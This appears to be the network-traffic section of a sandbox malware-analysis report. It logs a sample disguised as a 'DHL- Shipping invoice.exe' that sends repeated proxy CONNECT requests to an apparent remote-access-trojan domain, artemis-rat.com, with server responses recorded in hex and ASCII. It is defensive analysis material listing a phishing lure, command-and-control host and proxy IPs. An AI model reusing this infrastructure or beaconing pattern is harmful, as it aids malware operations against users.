                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1003192.168.2.45307291.203.114.71388386484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.043065071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.294580936 CET202INHTTP/1.0 404 Not Found
                            Content-Length: 717
                            Content-Type: text/html
                            Date: Sat, 27 May 2023 04:34:16 GMT
                            Expires: Sat, 27 May 2023 04:34:16 GMT
                            Server: Mikrotik HttpProxy
                            Proxy-Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1004192.168.2.452691159.223.166.2150786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.043641090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.140646935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.240087986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.343808889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1005192.168.2.451013135.148.10.16139706484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.047781944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.140784979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.240108967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1006192.168.2.451088162.223.89.84806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.051875114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.816082954 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1007192.168.2.452978175.183.82.221806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.054380894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1008192.168.2.45303747.76.163.11531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.054940939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.749965906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.750204086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.397242069 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1009192.168.2.453191218.145.131.1824436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.066401005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1010192.168.2.453192218.145.131.1824436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.068028927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1011192.168.2.453030102.132.54.3480806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.069370031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1012192.168.2.453098185.82.218.5210806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.121769905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1013192.168.2.453024203.160.61.10441456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.121773005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1014192.168.2.450923185.136.150.25241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.128936052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1015192.168.2.453000103.83.252.6110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.129844904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1016192.168.2.453099213.14.32.6741536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.142316103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.749927998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1017192.168.2.45119142.61.48.21980006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.158623934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.760736942 CET74INHTTP/1.1 200 OK
                            date: Tue, 12 Mar 2024 07:16:50 GMT
                            server: svcproxy


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1018192.168.2.453055218.252.244.126806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.158767939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1019192.168.2.45316438.54.95.1980606484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.159713984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.640424967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.046946049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.750094891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953665972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.250149965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453562975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.950352907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.750194073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1020192.168.2.45261769.61.200.104361816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.159713984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1021192.168.2.452699165.227.221.8380806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.160198927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250056982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.250282049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.250102997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1022192.168.2.45315523.134.94.24580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.177400112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1023192.168.2.4531975.161.103.113806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.178059101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.271235943 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1024192.168.2.453190153.92.214.224806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.183782101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.293737888 CET911INHTTP/1.1 501
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Type: text/html;charset=utf-8
                            Content-Language: en
                            Content-Length: 724
                            Connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 35 30 31 20 e2 80 93 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 35 30 31 20 e2 80 93 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 48 54 54 50 20 72 65 71 75 65 73 74 73 20 75 73 69 6e 67 20 74 68 65 20 43 4f 4e 4e 45 43 54 20 6d 65 74 68 6f 64 20 61 72 65 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 73 65 72 76 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 74 68 65 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 72 65 71 75 69 72 65 64 20 74 6f 20 66 75 6c 66 69 6c 6c 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 37 33 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                            Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 501 Not Implemented</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 501 Not Implemented</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> HTTP requests using the CONNECT method are not supported</p><p><b>Description</b> The server does not support the functionality required to fulfill the request.</p><hr class="line" /><h3>Apache Tomcat/9.0.73</h3></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1025192.168.2.453193162.241.46.40601026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.184191942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.562485933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.062622070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.750401974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250245094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.765887022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.250247955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953360081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.359419107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1026192.168.2.453090139.129.202.244806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.184237957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.503698111 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
